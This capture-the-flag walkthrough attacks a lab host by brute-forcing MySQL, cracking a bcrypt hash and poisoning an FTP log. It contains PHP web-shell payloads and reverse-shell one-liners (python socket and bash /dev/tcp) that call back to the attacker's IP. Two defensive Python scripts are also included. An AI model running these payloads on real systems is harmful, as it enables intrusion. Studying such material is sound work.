You won't be able to just brute your way into this one, or will you?
┌──(kali㉿kali)-[~/nappy]
└─$ rustscan -a 10.10.217.25 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.217.25:22
Open 10.10.217.25:21
Open 10.10.217.25:80
Open 10.10.217.25:3306
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-12 16:34 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 16:34
Completed Parallel DNS resolution of 1 host. at 16:34, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 16:34
Scanning 10.10.217.25 [4 ports]
Discovered open port 22/tcp on 10.10.217.25
Discovered open port 21/tcp on 10.10.217.25
Discovered open port 3306/tcp on 10.10.217.25
Discovered open port 80/tcp on 10.10.217.25
Completed Connect Scan at 16:34, 0.20s elapsed (4 total ports)
Initiating Service scan at 16:34
Scanning 4 services on 10.10.217.25
Completed Service scan at 16:34, 6.56s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.217.25.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 6.05s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 4.73s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
Nmap scan report for 10.10.217.25
Host is up, received user-set (0.20s latency).
Scanned at 2023-01-12 16:34:09 EST for 17s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c7721464243c1101e950730fa48c33d6 (RSA)
| ssh-rsa [key material not captured]
| 256 0e0e07a53c3209ed921b6884f12fcce1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLe3OgttRgIkQikz1ER+UuSSBb80MH3A+1Vmd+VNBKZhl9EqUBT4K+YpIA7NJdau/V1NzhuZdvVAUWd03rb43wk=
| 256 32f1d2ececc1ba2218ec02f4bc74c7af (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGj5zUvI22cV4JdUIj3IFx/3PVHqujyIkwU9MjP3gpay
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Login
3306/tcp open mysql syn-ack MySQL 8.0.28-0ubuntu0.20.04.3
| mysql-info:
| Protocol: 10
| Version: 8.0.28-0ubuntu0.20.04.3
| Thread ID: 18
| Capabilities flags: 65535
| Some Capabilities: Speaks41ProtocolNew, Support41Auth, LongColumnFlag, Speaks41ProtocolOld, SupportsTransactions, DontAllowDatabaseTableColumn, FoundRows, SupportsCompression, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, SwitchToSSLAfterHandshake, IgnoreSigpipes, InteractiveClient, ODBCClient, ConnectWithDatabase, LongPassword, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: T0~\x1Dt\x1B#1WZL\x1F\x0E 'S\x02\x16"i
|_ Auth Plugin Name: caching_sha2_password
| ssl-cert: Subject: commonName=MySQL_Server_8.0.26_Auto_Generated_Server_Certificate
| Issuer: commonName=MySQL_Server_8.0.26_Auto_Generated_CA_Certificate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-19T04:00:09
| Not valid after: 2031-10-17T04:00:09
| MD5: 5441cf59375b5402352d4df1dab3f945
| SHA-1: de74633f3958dd200a40e5b4ffa9cae862d89d46
| -----BEGIN CERTIFICATE-----
| MIIDBzCCAe+gAwIBAgIBAjANBgkqhkiG9w0BAQsFADA8MTowOAYDVQQDDDFNeVNR
| TF9TZXJ2ZXJfOC4wLjI2X0F1dG9fR2VuZXJhdGVkX0NBX0NlcnRpZmljYXRlMB4X
| DTIxMTAxOTA0MDAwOVoXDTMxMTAxNzA0MDAwOVowQDE+MDwGA1UEAww1TXlTUUxf
| U2VydmVyXzguMC4yNl9BdXRvX0dlbmVyYXRlZF9TZXJ2ZXJfQ2VydGlmaWNhdGUw
| ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDceHCeokIvf/5tiDXOhmUK
| HjWxbf+vHbhSEV0kg9J5CNyqL9JRLL+vLStv5KXyw4giERZmQZR7UM3VLu/jw1vg
| K3CMB7CWqaCTJclhqHgJXlH2OU0LGlkgjvoUjV2pnQKGsCEDVl2Q4QiXKzSMai4d
| ISz1QR9kQsV8bOEw7a46Ece9hPH4ESSUF7ZuTgnbLzBhxYlVa5HYQ2Zt7Z2c6ZGR
| fyJTMtovZzmxN0KWaiOJzCBAT5/ZaTiVR2mK0KpzoxJ1sut5Trw98Uh2iBtC/rXt
| z6+HiJjncW1phZNaXWgYrkp5GrGz39LPmK+XmBNlraokiLDubJkKrgvE8vILE9rd
| AgMBAAGjEDAOMAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggEBAKcxAdpb
| Z6ahf4CWhSPH4maAHWqYytghjPjG1Tlk6Lvwu3wTJUqItsmphvRIXvu1fME4TRZd
| ZG9ZM8BARM5ZZYCRHmhfGA5JBaKpAvfjhPNVssvVjSVI4cpiMTVrPikva22Qzxq7
| 33oVAFsfYlSiFqlRHqdNwAv5TSn0N85xU/En6DmUowaQzwTcPBrns1EC1lrDMBXU
| WY2rYfQiC0EkZVhkQuNGkXyUj/e89mwp8RVVJFkmjZ6NbuGCDCenG+A6/kDWj9ps
| mnDukjklQJKq9p6iIhrV69ejm3OHL5hfPRahBIM8AYAtljW2LQ67elYijyCde58Z
| AcodcjpmQ8egD1w=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.98 seconds
┌──(kali㉿kali)-[~/nappy]
└─$ ftp 10.10.217.25
Connected to 10.10.217.25.
220 (vsFTPd 3.0.3)
Name (10.10.217.25:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp>
ftp> exit
221 Goodbye.
https://dev.mysql.com/doc/refman/8.0/en/default-privileges.html
┌──(kali㉿kali)-[~/nappy]
└─$ nmap --script mysql-enum -sV -p 3306 -Pn 10.10.217.25
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-12 17:07 EST
Nmap scan report for 10.10.217.25
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 8.0.28-0ubuntu0.20.04.3
| mysql-enum:
| Valid usernames:
| root:<empty> - Valid credentials
| netadmin:<empty> - Valid credentials
| guest:<empty> - Valid credentials
| web:<empty> - Valid credentials
| user:<empty> - Valid credentials
| sysadmin:<empty> - Valid credentials
| administrator:<empty> - Valid credentials
| webadmin:<empty> - Valid credentials
| admin:<empty> - Valid credentials
| test:<empty> - Valid credentials
|_ Statistics: Performed 10 guesses in 2 seconds, average tps: 5.0
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.64 seconds
┌──(kali㉿kali)-[~/nappy]
└─$ mysql -h 10.10.183.215 -u root -p
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'ip-10-8-19-103.eu-west-1.compute.internal' (using password: YES)
┌──(kali㉿kali)-[~/nappy]
└─$ hydra -l root -P /usr/share/wordlists/rockyou.txt 10.10.183.215 mysql -V -t 64
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-13 11:09:37
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://10.10.183.215:3306/
[ATTEMPT] target 10.10.183.215 - login "root" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.183.215 - login "root" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.183.215 - login "root" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.183.215 - login "root" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.183.215 - login "root" - pass "iloveyou" - 5 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.183.215 - login "root" - pass "princess" - 6 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.183.215 - login "root" - pass "1234567" - 7 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.183.215 - login "root" - pass "rockyou" - 8 of 14344399 [child 2] (0/0)
[3306][mysql] host: 10.10.183.215 login: root password: rockyou
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-13 11:09:57
┌──(kali㉿kali)-[~/nappy]
└─$ mysql -h 10.10.183.215 -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 39
Server version: 8.0.28-0ubuntu0.20.04.3 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| website |
+--------------------+
5 rows in set (0.195 sec)
MySQL [(none)]> use website;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [website]> show tables;
+-------------------+
| Tables_in_website |
+-------------------+
| users |
+-------------------+
1 row in set (0.194 sec)
MySQL [website]> describe users;
+------------+--------------+------+-----+-------------------+-------------------+
| Field | Type | Null | Key | Default | Extra |
+------------+--------------+------+-----+-------------------+-------------------+
| id | int | NO | PRI | NULL | auto_increment |
| username | varchar(50) | NO | UNI | NULL | |
| password | varchar(255) | NO | | NULL | |
| created_at | datetime | YES | | CURRENT_TIMESTAMP | DEFAULT_GENERATED |
+------------+--------------+------+-----+-------------------+-------------------+
4 rows in set (0.498 sec)
MySQL [website]> select usernme, password from users;
ERROR 1054 (42S22): Unknown column 'usernme' in 'field list'
MySQL [website]> select username, password from users;
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| Adrian | $2y$10$tLzQuuQ.h6zBuX8dV83zmu9pFlGt3EF9gQO4aJ8KdnSYxz0SKn4we |
+----------+--------------------------------------------------------------+
1 row in set (0.326 sec)
or
MySQL [website]> select * from users;
+----+----------+--------------------------------------------------------------+---------------------+
| id | username | password | created_at |
+----+----------+--------------------------------------------------------------+---------------------+
| 1 | Adrian | $2y$10$tLzQuuQ.h6zBuX8dV83zmu9pFlGt3EF9gQO4aJ8KdnSYxz0SKn4we | 2021-10-20 02:43:42 |
+----+----------+--------------------------------------------------------------+---------------------+
1 row in set (0.412 sec)
https://hashcat.net/wiki/doku.php?id=example_hashes ($2*$ bcrypt --> 3200)
┌──(kali㉿kali)-[~/nappy]
└─$ cat hash_brute
$2y$10$tLzQuuQ.h6zBuX8dV83zmu9pFlGt3EF9gQO4aJ8KdnSYxz0SKn4we
┌──(kali㉿kali)-[~/nappy]
└─$ hashcat -m 3200 -a 0 hash_brute /usr/share/wordlists/rockyou.txt -o hash_brute_cracked
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.0+debian Linux, None+Asserts, RELOC, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 1240/2545 MB (512 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2y$10$tLzQuuQ.h6zBuX8dV83zmu9pFlGt3EF9gQO4aJ8KdnSY...SKn4we
Time.Started.....: Fri Jan 13 11:18:41 2023 (4 secs)
Time.Estimated...: Fri Jan 13 11:18:45 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 9 H/s (5.53ms) @ Accel:4 Loops:8 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 32/14344385 (0.00%)
Rejected.........: 0/32 (0.00%)
Restore.Point....: 16/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1016-1024
Candidate.Engine.: Device Generator
Candidates.#1....: 654321 -> butterfly
Hardware.Mon.#1..: Util: 72%
Started: Fri Jan 13 11:16:09 2023
Stopped: Fri Jan 13 11:18:49 2023
┌──(kali㉿kali)-[~/nappy]
└─$ hashcat -m 3200 -a 0 hash_brute --show
$2y$10$tLzQuuQ.h6zBuX8dV83zmu9pFlGt3EF9gQO4aJ8KdnSYxz0SKn4we:tigger
┌──(kali㉿kali)-[~/nappy]
└─$ cat hash_brute_cracked
$2y$10$tLzQuuQ.h6zBuX8dV83zmu9pFlGt3EF9gQO4aJ8KdnSYxz0SKn4we:tigger
or using john
┌──(kali㉿kali)-[~/nappy]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash_brute
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tigger (?)
1g 0:00:00:00 DONE (2023-01-13 11:20) 1.041g/s 37.50p/s 37.50c/s 37.50C/s 123456..liverpool
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Adrian:tigger
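The hashcat mode (3200) and john's "Cost 1 (iteration count) is 1024" both follow directly from the hash string's layout, and the 9 H/s hashcat reported is what makes bcrypt's cost parameter matter. The following Python is an added example, not code from the writeup or the room: it parses the bcrypt modular-crypt string, derives the iteration count from the cost, and estimates how the measured rate changes if the cost is raised. The only page-specific input is the hash recovered above; the policy threshold and the rate scaling are assumptions for illustration.

```python
import re
from typing import NamedTuple

# bcrypt modular-crypt layout: $<variant>$<cost>$<22-char salt><31-char digest>,
# salt and digest in bcrypt's own base64 alphabet (./A-Za-z0-9).
BCRYPT_RE = re.compile(
    r'^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$'
    r'(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$'
)

# Hash recovered from the website.users table in this writeup.
PAGE_HASH = "$2y$10$tLzQuuQ.h6zBuX8dV83zmu9pFlGt3EF9gQO4aJ8KdnSYxz0SKn4we"


class BcryptHash(NamedTuple):
    variant: str   # "2a", "2b", "2x" or "2y" ("2y" is what PHP's password_hash() emits)
    cost: int      # log2 of the key-expansion rounds
    salt: str
    digest: str

    @property
    def iterations(self) -> int:
        # bcrypt runs 2**cost rounds of key expansion; cost 10 -> 1024, as john reports
        return 2 ** self.cost


def parse_bcrypt(value: str) -> BcryptHash:
    """Split a bcrypt string into its fields; raise ValueError for anything else."""
    m = BCRYPT_RE.match(value.strip())
    if m is None:
        raise ValueError("not a bcrypt modular-crypt string")
    return BcryptHash(m['variant'], int(m['cost']), m['salt'], m['digest'])


def hashcat_mode(value: str) -> int:
    """hashcat's mode number for a bcrypt hash (raises if the string is not bcrypt)."""
    parse_bcrypt(value)
    return 3200   # "bcrypt $2*$, Blowfish (Unix)" in hashcat's example-hash table


def meets_cost_policy(value: str, min_cost: int) -> bool:
    """Storage-side check: is the stored hash at or above the required cost?"""
    return parse_bcrypt(value).cost >= min_cost


def scaled_rate_hps(measured_rate_hps: float, measured_cost: int, target_cost: int) -> float:
    """Assumed model: guessing throughput halves for every +1 in cost, so the
    9 H/s measured at cost 10 becomes 9 / 2**(target-10) at a higher cost."""
    return measured_rate_hps / (2 ** (target_cost - measured_cost))


def seconds_to_exhaust(keyspace: int, rate_hps: float) -> float:
    """Wall-clock time to try every candidate in a wordlist at a given rate."""
    return keyspace / rate_hps


if __name__ == "__main__":
    h = parse_bcrypt(PAGE_HASH)
    print(f"variant={h.variant} cost={h.cost} iterations={h.iterations} mode={hashcat_mode(PAGE_HASH)}")
    rockyou = 14344385   # keyspace hashcat reported for rockyou.txt above
    for cost in (10, 12, 14):
        rate = scaled_rate_hps(9.0, 10, cost)
        print(f"cost {cost}: ~{rate:.2f} H/s, full rockyou in ~{seconds_to_exhaust(rockyou, rate) / 86400:.0f} days")
```

The point for the defender is the second loop: the crack only finished in seconds because "tigger" sits within the first few dozen rockyou candidates, not because bcrypt was fast. A strong, non-wordlist password behind the same cost-10 hash would have taken weeks on this hardware, and each cost increment doubles that.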
login
view-source:http://10.10.183.215/welcome.php
<h1 class="my-5">Welcome back Adrian, Your log file is ready for viewing.</h1>
<br>
<form action="" method="post">
<input type="submit" name="log" value="Log">
</form>
<br>
<p>
<a href="logout.php" class="btn btn-danger ml-3">Sign Out of Your Account</a>
┌──(kali㉿kali)-[~/nappy]
└─$ ftp 10.10.183.215
Connected to 10.10.183.215.
220 (vsFTPd 3.0.3)
Name (10.10.183.215:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
Fri Jan 13 16:22:28 2023 [pid 1617] CONNECT: Client "::ffff:10.8.19.103"
Fri Jan 13 16:22:38 2023 [pid 1616] [anonymous] FAIL LOGIN: Client "::ffff:10.8.19.103"
┌──(kali㉿kali)-[~/nappy]
└─$ nc -vn 10.10.183.215 21
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Connected to 10.10.183.215:21.
220 (vsFTPd 3.0.3)
whoami
530 Please login with USER and PASS.
Ftp log poisoning
https://secnhack.in/ftp-log-poisoning-through-lfi/
payloads :
'<?php system($_GET['x']); ?>'
'<?php system($_REQUEST['x']); ?>'
'<?php echo system($_REQUEST['x']); ?>'
'<?php echo shell_exec($_GET['x']); ?>'
These are lines of PHP code that execute commands on the operating system of the server the code runs on. The difference between them is how the user input is received.
- In the first line, the command is received through the $_GET['x'] variable.
- In the second line, the command is received through the $_REQUEST['x'] variable.
- In the third line, the command is received through the $_REQUEST['x'] variable and its output is echoed into the web page.
- In the fourth line, the command is received through the $_GET['x'] variable and its output is echoed into the web page using the shell_exec() function.
However, these lines of code are highly dangerous, since they let an attacker execute any command on the server's operating system, including malicious ones. It is important to validate and sanitize any user input before using it in a function such as system() or shell_exec().
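From the defender's side, the vsftpd log that welcome.php displays is also the evidence trail: a log-poisoning attempt shows up as a "username" containing PHP tags, and the hydra runs show up as bursts of FAIL LOGIN entries from one client. The following Python script is an added example, not part of the original writeup or the room, that parses the vsftpd log layout seen above and flags both patterns. The log lines are constructed for the example (pids, timestamps and the second client address are made up; the PHP username mirrors the attempt shown in the FTP session).

```python
import re
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Constructed sample in the vsftpd log layout shown in this writeup.
SAMPLE_LOG = """\
Fri Jan 13 16:22:28 2023 [pid 1617] CONNECT: Client "::ffff:10.8.19.103"
Fri Jan 13 16:22:38 2023 [pid 1616] [anonymous] FAIL LOGIN: Client "::ffff:10.8.19.103"
Fri Jan 13 16:22:40 2023 [pid 1620] [anonymous] FAIL LOGIN: Client "::ffff:10.8.19.103"
Fri Jan 13 16:22:41 2023 [pid 1622] [root] FAIL LOGIN: Client "::ffff:10.8.19.103"
Fri Jan 13 16:22:41 2023 [pid 1624] [admin] FAIL LOGIN: Client "::ffff:10.8.19.103"
Fri Jan 13 16:22:42 2023 [pid 1626] [test] FAIL LOGIN: Client "::ffff:10.8.19.103"
Fri Jan 13 16:47:24 2023 [pid 2662] ['<?php system($_GET['x']); ?>'] FAIL LOGIN: Client "::ffff:10.8.19.103"
Fri Jan 13 17:00:01 2023 [pid 2700] [alice] OK LOGIN: Client "::ffff:10.8.0.5"
"""

# One vsftpd event line: timestamp, pid, optional [username], event, client.
# The username group is greedy so a ']' inside the username (as in $_GET['x'])
# does not cut it short; the regex backtracks to the '] ' before the event word.
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'(?:\[(?P<user>.*)\] )?'
    r'(?P<event>CONNECT|OK LOGIN|FAIL LOGIN): Client "(?P<client>[^"]+)"$'
)

# PHP open/close tags or a PHP superglobal never belong in a real FTP username.
POISON_RE = re.compile(r'<\?|\?>|\$_(?:GET|POST|REQUEST|COOKIE)\b')


@dataclass
class Entry:
    when: datetime
    user: Optional[str]   # None for CONNECT lines
    event: str
    client: str


def parse_log(text: str) -> List[Entry]:
    """Parse vsftpd event lines; lines that do not fit the layout (for example
    payload output that wrapped onto extra lines) are skipped."""
    entries: List[Entry] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m is None:
            continue
        when = datetime.strptime(m.group('ts'), '%a %b %d %H:%M:%S %Y')
        entries.append(Entry(when, m.group('user'), m.group('event'), m.group('client')))
    return entries


def poisoning_attempts(entries: List[Entry]) -> List[Entry]:
    """Entries whose username looks like injected PHP."""
    return [e for e in entries if e.user is not None and POISON_RE.search(e.user)]


def failed_login_bursts(entries: List[Entry], threshold: int = 5,
                        window: timedelta = timedelta(seconds=60)) -> Dict[str, int]:
    """Clients with at least `threshold` FAIL LOGIN events inside any sliding
    window of length `window`; maps client -> peak count in a window."""
    per_client: Dict[str, List[datetime]] = defaultdict(list)
    for e in entries:
        if e.event == 'FAIL LOGIN':
            per_client[e.client].append(e.when)

    flagged: Dict[str, int] = {}
    for client, times in per_client.items():
        recent: deque = deque()
        peak = 0
        for t in sorted(times):
            recent.append(t)
            while t - recent[0] > window:   # drop failures older than the window
                recent.popleft()
            peak = max(peak, len(recent))
        if peak >= threshold:
            flagged[client] = peak
    return flagged


if __name__ == "__main__":
    parsed = parse_log(SAMPLE_LOG)
    for hit in poisoning_attempts(parsed):
        print(f"log poisoning attempt from {hit.client} at {hit.when}: {hit.user!r}")
    for client, n in failed_login_bursts(parsed).items():
        print(f"password spraying/brute force from {client}: {n} failures in 60s")
```

The same regex also reveals why the page's later log output wrapped onto two lines: once a poisoned entry is included and executed, the command output is written into the log in place of the username, so any line that no longer fits the layout is itself a signal worth alerting on.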
┌──(kali㉿kali)-[~/nappy]
└─$ ftp 10.10.183.215
Connected to 10.10.183.215.
220 (vsFTPd 3.0.3)
Name (10.10.183.215:kali): '<?php system($_GET['x']); ?>'
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> exit
221 Goodbye.
http://10.10.183.215/welcome.php?x=id
Fri Jan 13 16:47:24 2023 [pid 2662] ['uid=33(www-data) gid=33(www-data) groups=33(www-data)
'] FAIL LOGIN: Client "::ffff:10.8.19.103"
revshell
https://www.revshells.com/
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.19.103",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
┌──(kali㉿kali)-[~/nappy]
└─$ rlwrap nc -lnvp 4443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4443
Ncat: Listening on 0.0.0.0:4443
Ncat: Connection from 10.10.183.215.
Ncat: Connection from 10.10.183.215:51494.
www-data@brute:/var/www/html$ exit
exit
exit
or
bash -c 'bash -i >& /dev/tcp/10.8.19.103/4444 0>&1'
bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F10%2E8%2E19%2E103%2F4444%200%3E%261%27
┌──(kali㉿kali)-[~/nappy]
└─$ rlwrap nc -lnvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.183.215.
Ncat: Connection from 10.10.183.215:37024.
bash: cannot set terminal process group (766): Inappropriate ioctl for device
bash: no job control in this shell
www-data@brute:/var/www/html$
or using burp
┌──(kali㉿kali)-[~/nappy]
└─$ ftp 10.10.183.215
Connected to 10.10.183.215.
220 (vsFTPd 3.0.3)
Name (10.10.183.215:kali): '<?php echo system($_REQUEST['x']); ?>'
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> exit
221 Goodbye.
using request with burp
---
POST /welcome.php HTTP/1.1
Host: 10.10.183.215
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
Origin: http://10.10.183.215
Connection: close
Referer: http://10.10.183.215/welcome.php
Cookie: PHPSESSID=627ddsmmq6t3vkk494opc7qc56
Upgrade-Insecure-Requests: 1
log=Log&x=whoami
---
Fri Jan 13 17:31:51 2023 [pid 6549] CONNECT: Client "::ffff:10.8.19.103"
Fri Jan 13 17:31:56 2023 [pid 6548] ['www-data
www-data'] FAIL LOGIN: Client "::ffff:10.8.19.103"
to encode just press CTRL + U
bash+-c+'bash+-i+>%26+/dev/tcp/10.8.19.103/4444+0>%261'
log=Log&x=bash+-c+'bash+-i+>%26+/dev/tcp/10.8.19.103/4444+0>%261'
and then send
┌──(kali㉿kali)-[~/nappy]
└─$ rlwrap nc -lnvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.183.215.
Ncat: Connection from 10.10.183.215:37028.
bash: cannot set terminal process group (766): Inappropriate ioctl for device
bash: no job control in this shell
www-data@brute:/var/www/html$ whoami
whoami
www-data
stabilizing shell
www-data@brute:/var/www/html$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@brute:/var/www/html$
zsh: suspended rlwrap nc -lnvp 4444
┌──(kali㉿kali)-[~/nappy]
└─$ stty raw -echo; fg
[1] + continued rlwrap nc -lnvp 4444
www-data@brute:/var/www/html$ export TERM=xterm-256color
TERM=xterm-256color
This is a terminal command used to change the terminal's settings.
- "stty raw" disables the terminal's interpretation of special characters, so keys such as Ctrl or Alt combinations can be typed without the terminal treating them as commands.
- "-echo" disables echoing of typed characters, meaning the characters are not printed on screen as they are entered.
"fg" is a command used to bring a background job to the foreground.
This is a command-line command used to set an environment variable named TERM. The operating system uses this variable to determine what kind of terminal is in use.
The value given in the command ("xterm") indicates that an xterm terminal is being used. This is one of the most common terminals on Unix and Linux systems and supports a wide variety of features and functions.
There are several terminal types (vt100, xterm, ansi, etc.) and each has its own settings and characteristics. Setting TERM=xterm tells the operating system that an xterm terminal is in use, which lets it use xterm's specific features and settings.
